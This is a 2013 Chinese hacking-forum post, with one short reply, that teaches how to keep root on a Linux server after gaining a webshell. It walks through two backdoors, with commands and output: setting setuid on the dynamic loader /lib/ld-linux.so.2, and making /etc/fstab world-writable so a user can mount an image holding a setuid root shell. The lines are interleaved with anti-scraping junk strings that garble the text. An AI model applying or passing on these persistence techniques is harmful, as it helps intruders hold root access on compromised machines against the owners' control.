找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3042|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
, M# W' T( q, A
% z# u' }3 |7 x! F% f[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究7 I6 c9 `$ D/ X* G
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
% N: p5 N6 [* _! C6 _  g& g7 qlrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
/ L. v6 f! |; c1 K/ y[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
& y* k: S& ?7 F" P2 @" i[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究. T, \. z9 A% k$ o& ]7 R
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
4 S1 ~2 p7 ]5 N' {4 Y9 d: y* ]lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
! v# d9 B5 B% n+ W9 M0 k6 R" J[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
' g  z1 [- \0 ?) p: O4 }) t/ ^2 D我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
% i. B" O6 q- k* \* n- c& o3 `$ c4 r: F- p6 o
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
5 b, b% J3 H1 s- E* F4 I6 m/ s* ^7 I" B" R# `" Q
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究% r8 U" n/ S  B3 b2 _
xiaoyu2ezX-BUG-关注前沿信息安全技术研究' u' W( V8 B' x" |1 z
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
# l) S$ ]3 G/ H& g/ x$ c+ K* proot2ezX-BUG-关注前沿信息安全技术研究8 q' W  |& o. V" O( {3 E% l3 `; W
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究( e$ @: p3 G9 M4 n# o
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究8 G6 r3 w5 Y' A( w' M% z/ c

5 T' d/ Q' B, O2 Z4 D方法二:2ezX-BUG-关注前沿信息安全技术研究
- N8 m3 A& _% z4 G3 d' P
& q0 a3 f0 \& D/ R看过程:2ezX-BUG-关注前沿信息安全技术研究6 }" t: S7 o$ R3 j& D, Y9 J+ d

  U( `: C" g5 D3 K+ O/ l[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
; _% p9 c7 |: F[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究
& I4 \9 ~6 J! x* S0 o8 E; w
9 C# X- [+ c. ]+ s. r( u这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
3 \4 K7 U7 s! Z/ J3 G" r+ [9 R5 g! f: X6 G' G, ?8 Y. z
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究" Z2 t0 D7 P; f  P) K# M# ~
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究3 u3 `# K$ K- t' n6 E2 Z3 ^6 L
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
! |; M+ T" q) @4 t% y) }8 p
; X( Z, f2 x; ^; A2 b然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究7 c, `- U/ ?; e1 {  q) \
2 Q9 H2 L% |3 t8 S% |! H- I- r
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究2 ?8 o$ L5 @5 E2 U- z1 i4 x6 S5 Z3 K
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
$ [5 Z- b- a2 M, Z  a# N[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
' s+ q- y- x8 |$ V% L( m[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究2 X4 ?0 Y; M! f2 X
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
) Y( o/ V  B5 v) c' H2 Ftotal 182ezX-BUG-关注前沿信息安全技术研究" e- }- k3 A  Q: n
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
& d6 u; F  S! [) w7 B- Z-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
" [* l7 W% l0 L! k" M) ?( J[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究6 o5 c! Z6 Z& R
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究* Q* J5 n$ i* b& c& D  F+ R
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究+ H" C9 `; p2 d  r
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
2 h* s7 Y8 y) T4 U/ B. E4 Z3 ]' @( ^$ z" q3 p, \: r1 l  L$ V
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
0 s8 Q0 n: Y( H* k4 ?2ezX-BUG-关注前沿信息安全技术研究- d+ D0 c$ A$ w3 e

, R2 P& ?* h; u( G6 Y9 W
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表